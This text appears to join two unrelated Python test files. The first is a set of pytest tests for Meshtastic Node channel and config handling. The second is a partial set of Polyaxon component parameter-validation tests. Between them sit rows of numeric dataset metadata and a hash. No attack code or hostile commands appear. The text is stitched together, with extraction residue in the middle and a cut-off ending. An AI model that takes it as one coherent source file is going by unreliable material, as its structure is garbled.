channels = [ channel1, channel2, channel3, channel4, channel5, channel6, channel7, channel8 ]
anode.channels = channels
anode.turnOffEncryptionOnPrimaryChannel()
out, err = capsys.readouterr()
assert re.search(r'Writing modified channels to device', out)
assert err == ''
@pytest.mark.unit
def test_writeConfig_with_no_radioConfig(capsys):
"""Test writeConfig with no radioConfig."""
anode = Node('foo', 'bar', noProto=True)
with pytest.raises(SystemExit) as pytest_wrapped_e:
anode.writeConfig()
assert pytest_wrapped_e.type == SystemExit
assert pytest_wrapped_e.value.code == 1
out, err = capsys.readouterr()
assert re.search(r'Error: No RadioConfig has been read', out)
assert err == ''
@pytest.mark.unit
def test_writeConfig(caplog):
"""Test writeConfig"""
anode = Node('foo', 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
with caplog.at_level(logging.DEBUG):
anode.writeConfig()
assert re.search(r'Wrote config', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_requestChannel_not_localNode(caplog, capsys):
"""Test _requestChannel()"""
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
with caplog.at_level(logging.DEBUG):
anode._requestChannel(0)
assert re.search(r'Requesting channel 0 info from remote node', caplog.text, re.MULTILINE)
out, err = capsys.readouterr()
assert re.search(r'Requesting channel 0 info', out, re.MULTILINE)
assert err == ''
@pytest.mark.unit
def test_requestChannel_localNode(caplog):
"""Test _requestChannel()"""
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
with caplog.at_level(logging.DEBUG):
anode._requestChannel(0)
assert re.search(r'Requesting channel 0', caplog.text, re.MULTILINE)
assert not re.search(r'from remote node', caplog.text, re.MULTILINE)
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart1(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart1()"""
#
# part1 = CannedMessagePluginMessagePart1()
# part1.text = 'foo1'
#
# msg1 = MagicMock(autospec=AdminMessage)
# msg1.get_canned_message_plugin_part1_response = part1
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart1Response': {'text': 'foo1'},
# 'raw': msg1
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart1(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart1', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart1 == 'foo1'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart2(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart2()"""
#
# part2 = CannedMessagePluginMessagePart2()
# part2.text = 'foo2'
#
# msg2 = MagicMock(autospec=AdminMessage)
# msg2.get_canned_message_plugin_part2_response = part2
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart2Response': {'text': 'foo2'},
# 'raw': msg2
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart2(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart2', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart2 == 'foo2'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart3(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart3()"""
#
# part3 = CannedMessagePluginMessagePart3()
# part3.text = 'foo3'
#
# msg3 = MagicMock(autospec=AdminMessage)
# msg3.get_canned_message_plugin_part3_response = part3
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart3Response': {'text': 'foo3'},
# 'raw': msg3
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart3(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart3', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart3 == 'foo3'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart4(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart4()"""
#
# part4 = CannedMessagePluginMessagePart4()
# part4.text = 'foo4'
#
# msg4 = MagicMock(autospec=AdminMessage)
# msg4.get_canned_message_plugin_part4_response = part4
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart4Response': {'text': 'foo4'},
# 'raw': msg4
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart4(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart4', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart4 == 'foo4'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart5(caplog):
# """Test onResponseRequestCannedMessagePluginMessagePart5()"""
#
# part5 = CannedMessagePluginMessagePart5()
# part5.text = 'foo5'
#
# msg5 = MagicMock(autospec=AdminMessage)
# msg5.get_canned_message_plugin_part5_response = part5
#
#
# packet = {
# 'from': 682968612,
# 'to': 682968612,
# 'decoded': {
# 'portnum': 'ADMIN_APP',
# 'payload': 'faked',
# 'requestId': 927039000,
# 'admin': {
# 'getCannedMessagePluginPart5Response': {'text': 'foo5'},
# 'raw': msg5
# }
# },
# 'id': 589440320,
# 'rxTime': 1642710843,
# 'hopLimit': 3,
# 'priority': 'RELIABLE',
# 'raw': 'faked',
# 'fromId': '!28b54624',
# 'toId': '!28b54624'
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart5(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart5', caplog.text, re.MULTILINE)
# assert anode.cannedPluginMessagePart5 == 'foo5'
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart1_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart1() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart1(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart1', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart2_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart2() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart2(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart2', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart3_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart3() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart3(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart3', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart4_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart4() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart4(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart4', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
#
#
#@pytest.mark.unit
#def test_onResponseRequestCannedMessagePluginMesagePart5_error(caplog, capsys):
# """Test onResponseRequestCannedMessagePluginMessagePart5() with error"""
#
# packet = {
# 'decoded': {
# 'routing': {
# 'errorReason': 'some made up error',
# },
# },
# }
#
# iface = MagicMock(autospec=SerialInterface)
# with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
# anode = Node(mo, 'bar', noProto=True)
# # Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
# mo.localNode = anode
#
# with caplog.at_level(logging.DEBUG):
# anode.onResponseRequestCannedMessagePluginMessagePart5(packet)
# assert re.search(r'onResponseRequestCannedMessagePluginMessagePart5', caplog.text, re.MULTILINE)
# out, err = capsys.readouterr()
# assert re.search(r'Error on response', out)
# assert err == ''
@pytest.mark.unit
def test_onResponseRequestChannel(caplog):
"""Test onResponseRequestChannel()"""
channel1 = Channel(index=1, role=1)
channel1.settings.modem_config = 3
channel1.settings.psk = b'\x01'
msg1 = MagicMock(autospec=AdminMessage)
msg1.get_channel_response = channel1
msg2 = MagicMock(autospec=AdminMessage)
channel2 = Channel(index=2, role=0) # disabled
msg2.get_channel_response = channel2
# default primary channel
packet1 = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b':\t\x12\x05\x18\x03"\x01\x01\x18\x01',
'requestId': 2615094405,
'admin': {
'getChannelResponse': {
'settings': {
'modemConfig': 'Bw125Cr48Sf4096',
'psk': 'AQ=='
},
'role': 'PRIMARY'
},
'raw': msg1,
}
},
'id': 1692918436,
'hopLimit': 3,
'priority':
'RELIABLE',
'raw': 'fake',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
# no other channels
packet2 = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b':\x04\x08\x02\x12\x00',
'requestId': 743049663,
'admin': {
'getChannelResponse': {
'index': 2,
'settings': {}
},
'raw': msg2,
}
},
'id': 1692918456,
'rxTime': 1640202239,
'hopLimit': 3,
'priority': 'RELIABLE',
'raw': 'faked',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
with caplog.at_level(logging.DEBUG):
anode.requestConfig()
anode.onResponseRequestChannel(packet1)
assert re.search(r'Received channel', caplog.text, re.MULTILINE)
anode.onResponseRequestChannel(packet2)
assert re.search(r'Received channel', caplog.text, re.MULTILINE)
assert re.search(r'Finished downloading channels', caplog.text, re.MULTILINE)
assert len(anode.channels) == 8
assert anode.channels[0].settings.modem_config == 3
assert anode.channels[1].settings.name == ''
assert anode.channels[2].settings.name == ''
assert anode.channels[3].settings.name == ''
assert anode.channels[4].settings.name == ''
assert anode.channels[5].settings.name == ''
assert anode.channels[6].settings.name == ''
assert anode.channels[7].settings.name == ''
@pytest.mark.unit
def test_onResponseRequestSetting(caplog):
"""Test onResponseRequestSetting()"""
# Note: Split out the get_radio_response to a MagicMock
# so it could be "returned" (not really sure how to do that
# in a python dict.
amsg = MagicMock(autospec=AdminMessage)
amsg.get_radio_response = """{
preferences {
phone_timeout_secs: 900
ls_secs: 300
position_broadcast_smart: true
position_flags: 35
}
}"""
packet = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b'*\x0e\n\x0c0\x84\x07P\xac\x02\x88\x01\x01\xb0\t#',
'requestId': 3145147848,
'admin': {
'getRadioResponse': {
'preferences': {
'phoneTimeoutSecs': 900,
'lsSecs': 300,
'positionBroadcastSmart': True,
'positionFlags': 35
}
},
'raw': amsg
},
'id': 365963704,
'rxTime': 1640195197,
'hopLimit': 3,
'priority': 'RELIABLE',
'raw': 'faked',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
}
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
with caplog.at_level(logging.DEBUG):
anode.onResponseRequestSettings(packet)
assert re.search(r'Received radio config, now fetching channels..', caplog.text, re.MULTILINE)
@pytest.mark.unit
def test_onResponseRequestSetting_with_error(capsys):
"""Test onResponseRequestSetting() with an error"""
packet = {
'from': 2475227164,
'to': 2475227164,
'decoded': {
'portnum': 'ADMIN_APP',
'payload': b'*\x0e\n\x0c0\x84\x07P\xac\x02\x88\x01\x01\xb0\t#',
'requestId': 3145147848,
'routing': {
'errorReason': 'some made up error',
},
'admin': {
'getRadioResponse': {
'preferences': {
'phoneTimeoutSecs': 900,
'lsSecs': 300,
'positionBroadcastSmart': True,
'positionFlags': 35
}
},
},
'id': 365963704,
'rxTime': 1640195197,
'hopLimit': 3,
'priority': 'RELIABLE',
'fromId': '!9388f81c',
'toId': '!9388f81c'
}
}
iface = MagicMock(autospec=SerialInterface)
with patch('meshtastic.serial_interface.SerialInterface', return_value=iface) as mo:
mo.localNode.getChannelByName.return_value = None
mo.myInfo.max_channels = 8
anode = Node(mo, 'bar', noProto=True)
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
# Note: Have to do this next line because every call to MagicMock object/method returns a new magic mock
mo.localNode = anode
anode.onResponseRequestSettings(packet)
out, err = capsys.readouterr()
assert re.search(r'Error on response', out)
assert err == ''
@pytest.mark.unitslow
def test_waitForConfig():
"""Test waitForConfig()"""
anode = Node('foo', 'bar')
radioConfig = RadioConfig()
anode.radioConfig = radioConfig
anode._timeout = Timeout(0.01)
result = anode.waitForConfig()
assert not result
| 37.413217
| 129
| 0.638282
| 5,807
| 51,518
| 5.578956
| 0.069399
| 0.039633
| 0.022502
| 0.036114
| 0.837732
| 0.813038
| 0.767201
| 0.754669
| 0.734358
| 0.703491
| 0
| 0.046925
| 0.233918
| 51,518
| 1,376
| 130
| 37.440407
| 0.773938
| 0.395745
| 0
| 0.70614
| 0
| 0.017544
| 0.136517
| 0.067717
| 0
| 0
| 0
| 0.000727
| 0.21345
| 1
| 0.05117
| false
| 0
| 0.01462
| 0
| 0.065789
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
0a29aab0484a185cc6accc0bad4ad157726655fb
| 25,921
|
py
|
Python
|
core/tests/test_polyflow/test_components/test_components.py
|
admariner/polyaxon
|
ba355c38166047eb11e60de4cee4d7c3b48db323
|
[
"Apache-2.0"
] | 3,200
|
2017-05-09T11:35:31.000Z
|
2022-03-28T05:43:22.000Z
|
core/tests/test_polyflow/test_components/test_components.py
|
admariner/polyaxon
|
ba355c38166047eb11e60de4cee4d7c3b48db323
|
[
"Apache-2.0"
] | 1,324
|
2017-06-29T07:21:27.000Z
|
2022-03-27T12:41:10.000Z
|
core/tests/test_polyflow/test_components/test_components.py
|
admariner/polyaxon
|
ba355c38166047eb11e60de4cee4d7c3b48db323
|
[
"Apache-2.0"
] | 341
|
2017-01-10T23:06:53.000Z
|
2022-03-10T08:15:18.000Z
|
#!/usr/bin/python
#
# Copyright 2018-2021 Polyaxon, Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import pytest
from marshmallow import ValidationError
from polyaxon import types
from polyaxon.polyflow import V1Component, V1RunKind, ops_params
from polyaxon.utils.tz_utils import local_datetime, now
from tests.utils import BaseTestCase
@pytest.mark.components_mark
class TestComponentsConfigs(BaseTestCase):
def test_passing_params_declarations_raises(self):
config_dict = {
"params": {"foo": {"value": "bar"}},
"declarations": {"foo": "bar"},
}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
def test_passing_wrong_params(self):
config_dict = {"params": {"foo": "bar"}}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
def test_passing_params_raises(self):
config_dict = {"params": {"foo": "bar"}}
with self.assertRaises(ValidationError):
V1Component.from_dict(config_dict)
def test_param_validation_with_inputs(self):
config_dict = {
"inputs": [
{"name": "param1", "type": types.STR},
{"name": "param2", "type": types.INT},
{"name": "param3", "type": types.FLOAT},
{"name": "param4", "type": types.BOOL},
{"name": "param5", "type": types.DICT},
{"name": "param6", "type": types.LIST},
{"name": "param7", "type": types.GCS},
{"name": "param8", "type": types.S3},
{"name": "param9", "type": types.WASB},
{"name": "param10", "type": types.PATH},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
component = V1Component.from_dict(config_dict)
params = {
"param1": {"value": "text"},
"param2": {"value": 12},
"param3": {"value": 13.3},
"param4": {"value": False},
"param5": {"value": {"foo": "bar"}},
"param6": {"value": [1, 3, 45, 5]},
"param7": {"value": "gs://bucket/path/to/blob/"},
"param8": {"value": "s3://test/this/is/bad/key.txt"},
"param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
"param10": {"value": "/foo/bar"},
}
validated_params = ops_params.validate_params(
params=params, inputs=component.inputs, outputs=None, is_template=False
)
assert params == {p.name: {"value": p.param.value} for p in validated_params}
# Passing missing params
params.pop("param1")
params.pop("param2")
with self.assertRaises(ValidationError):
ops_params.validate_params(
params=params, inputs=component.inputs, outputs=None, is_template=False
)
def test_param_validation_with_outputs(self):
config_dict = {
"outputs": [
{"name": "param1", "type": types.STR},
{"name": "param2", "type": types.INT},
{"name": "param3", "type": types.FLOAT},
{"name": "param4", "type": types.BOOL},
{"name": "param5", "type": types.DICT},
{"name": "param6", "type": types.LIST},
{"name": "param7", "type": types.GCS},
{"name": "param8", "type": types.S3},
{"name": "param9", "type": types.WASB},
{"name": "param10", "type": types.PATH},
{"name": "param11", "type": types.METRIC},
{"name": "param12", "type": types.METADATA},
{"name": "param13", "type": types.METADATA},
{"name": "param14", "type": types.METADATA},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
component = V1Component.from_dict(config_dict)
params = {
"param1": {"value": "text"},
"param2": {"value": 12},
"param3": {"value": 13.3},
"param4": {"value": False},
"param5": {"value": {"foo": "bar"}},
"param6": {"value": [1, 3, 45, 5]},
"param7": {"value": "gs://bucket/path/to/blob/"},
"param8": {"value": "s3://test/this/is/bad/key.txt"},
"param9": {"value": "wasbs://container@user.blob.core.windows.net/"},
"param10": {"value": "/foo/bar"},
"param11": {"value": 124.4},
"param12": {"value": {"foo": 124.4}},
"param13": {"value": {"foo": "bar"}},
"param14": {"value": {"foo": ["foo", 124.4]}},
}
validated_params = ops_params.validate_params(
params=params, inputs=None, outputs=component.outputs, is_template=False
)
assert params == {p.name: {"value": p.param.value} for p in validated_params}
# Passing missing params
params.pop("param1")
params.pop("param2")
validated_params = ops_params.validate_params(
params=params, inputs=None, outputs=component.outputs, is_template=False
)
params["param1"] = {"value": None}
params["param2"] = {"value": None}
assert params == {p.name: {"value": p.param.value} for p in validated_params}
def test_required_input_no_param_only_validated_on_run(self):
# Inputs
config_dict = {
"inputs": [
{"name": "param1", "type": types.STR},
{"name": "param10", "type": types.PATH},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": "text"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Outputs
config_dict = {
"outputs": [
{"name": "param1", "type": types.STR},
{"name": "param10", "type": types.PATH},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
ops_params.validate_params(
params={"param1": {"value": "text"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# IO
config_dict = {
"inputs": [{"name": "param1", "type": types.STR}],
"outputs": [{"name": "param10", "type": types.PATH}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
ops_params.validate_params(
params={"param1": {"value": "text"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
def test_incomplete_params(self):
config_dict = {
"inputs": [
{"name": "param1", "type": types.INT},
{"name": "param2", "type": types.INT},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
config_dict = {
"outputs": [
{"name": "param1", "type": types.INT, "value": 12, "isOptional": True},
{"name": "param2", "type": types.INT},
],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
ops_params.validate_params(
params={"param1": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
def test_extra_params(self):
# inputs
config_dict = {
"inputs": [{"name": "param1", "type": types.INT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": 1}, "param2": {"value": 2}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# outputs
config_dict = {
"outputs": [{"name": "param1", "type": types.INT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": 1}, "param2": {"value": 2}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
def test_param_validation_with_mismatched_inputs(self):
config_dict = {
"inputs": [{"name": "param1", "type": types.INT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
# Passing correct param
ops_params.validate_params(
params={"param1": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param1": {"value": "-1"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param1": {"value": 12.0}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param1": {"value": "12."}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param1": {"value": 12.0}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param1": {"value": "12.0"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Passing wrong type
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": "text"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": 12.1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": "12.1"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": {"foo": "bar"}}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param1": {"value": "gs://bucket/path/to/blob/"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
config_dict = {
"inputs": [{"name": "param2", "type": types.FLOAT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
# Passing correct param
ops_params.validate_params(
params={"param2": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
ops_params.validate_params(
params={"param2": {"value": False}}, # auto-conversion (int to 0 to 0.0)
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Passing wrong type
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param2": {"value": "test"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param2": {"foo": "bar"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param2": {"value": ["gs://bucket/path/to/blob/"]}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
config_dict = {
"inputs": [{"name": "param7", "type": types.WASB}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
# Passing correct param
ops_params.validate_params(
params={
"param7": {"value": "wasbs://container@user.blob.core.windows.net/"}
},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
# Passing wrong param
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param7": {"value": "gs://bucket/path/to/blob/"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param7": {"value": "s3://test/this/is/bad/key.txt"}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
with self.assertRaises(ValidationError):
ops_params.validate_params(
params={"param7": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
is_template=False,
)
def test_param_validation_with_mismatched_outputs(self):
config_dict = {
"outputs": [{"name": "param1", "type": types.INT}],
"run": {"kind": V1RunKind.JOB, "container": {"image": "test"}},
}
config = V1Component.from_dict(config_dict)
# Passing correct param
ops_params.validate_params(
params={"param1": {"value": 1}},
inputs=config.inputs,
outputs=config.outputs,
